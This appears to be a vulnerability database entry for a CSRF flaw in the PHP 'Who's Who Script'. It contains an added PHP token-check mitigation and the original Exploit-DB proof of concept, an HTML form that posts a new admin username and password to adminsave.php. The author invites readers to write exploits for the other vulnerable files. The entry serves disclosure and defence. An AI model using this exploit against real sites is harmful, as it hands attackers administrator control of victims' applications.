Vendor: Who's Who Script
Author: ZoRLu
CVSS: 8.8 (HIGH)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)
Product Name: Who's Who Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Who’s Who Script CSRF Exploit (Add Admin Account)

This exploit lets an attacker add an admin account to Who's Who Script by abusing the CSRF vulnerability in the ayarsave.php, uyesave.php, slaytadd.php, and slaytsave.php files. The attacker crafts a malicious HTML page containing a form with username and password fields whose action points at the vulnerable file. The form is submitted automatically, without the user's knowledge, and the attacker thereby adds an admin account to Who's Who Script.

Mitigation:

The application should use a random token in the form that is checked on the server side to prevent CSRF attacks.
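The token check described above, written as an added example that is not part of Who's Who Script or the original advisory: a synchronizer token is stored in the PHP session, embedded in the admin form as a hidden field, and verified with a constant-time comparison before adminsave.php processes the POST. The file name csrf.php and the form/handler layout are assumptions. The check holds even though the victim's browser attaches the valid session cookie to a forged POST, because the attacker's page cannot read the token and so cannot supply it.

```php
<?php
// csrf.php (assumed file name): synchronizer-token helpers for the yonetim admin forms.
declare(strict_types=1);

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded so it embeds safely in HTML.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to include in every state-changing form (adminsave, ayarsave, ...).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Reject the request unless the submitted token matches the one in the session.
// hash_equals() compares in constant time; is_string() guards against csrf_token[] arrays.
function csrf_verify(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $sent = $_POST['csrf_token'] ?? '';
    $real = $_SESSION['csrf_token'] ?? '';
    if ($real === '' || !is_string($sent) || !hash_equals($real, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// --- usage in the form page (assumed layout) ---
// require __DIR__ . '/csrf.php';
// echo '<form method="post" action="adminsave.php">' . csrf_field()
//    . '<input type="text" name="username" /><input type="password" name="password" />'
//    . '<input type="submit" name="gonder" value="Save" /></form>';

// --- usage at the top of adminsave.php, before the existing login check and INSERT ---
// require __DIR__ . '/csrf.php';
// csrf_verify();
```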
Source

Exploit-DB raw data:

# Title        : Who's Who Script CSRF Exploit (Add Admin Account)
# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home         : http://milw00rm.com / it's online
# Date         : 30.10.2014
# Demo         : http://demo.phpscriptlerim.com/free/whoswho/
# Download1    : http://www.phpscriptlerim.com/download/indir.php?id=14
# Download2    : https://yadi.sk/d/C8eQcvUeJjeZ2
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Note         : I wrote the exploit for adminsave.php, but other files in the /yonetim/plugins folder have the vuln.
#                You can write exploits for the other files.
# Vulnerable   : ayarsave.php, uyesave.php, slaytadd.php, slaytsave.php
# Not Vuln     : uyedel.php and slaytdel.php are not vulnerable to CSRF, because session control is available in those files.

<html>
<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<title>Who's Who Script CSRF Exploit (Add Admin Account)</title>
</head>

<body>

<div id="main">

	<div id="cols" class="box">

		<hr class="noscreen" />

		<div id="content" class="box">
			<h1>Admin Panel</h1>
			<br><br><br>
			<form method="post" action="http://localhost/filepath/yonetim/plugin/adminsave.php">
				<label><b>Username:</b></label><br>
				<input type="text" size="40" name="username" value="admin" class="input-text" /><br><br>

				<label><b>Password:</b></label><br>
				<input type="text" size="40" name="password" class="input-text" /><br><br>

				<input type="submit" class="input-submit" name="gonder" value="Save" />
			</form>
			<br><br>
		</div>

	</div>

	<hr class="noscreen" />

	<div id="footer" class="box">

		<p class="f-left">© Coded by ZoRLu</p>

		<p class="f-right"><a href="http://milw00rm.com" target="_blank">milw00rm.com</a></p>

	</div>

</div>

</body>
</html>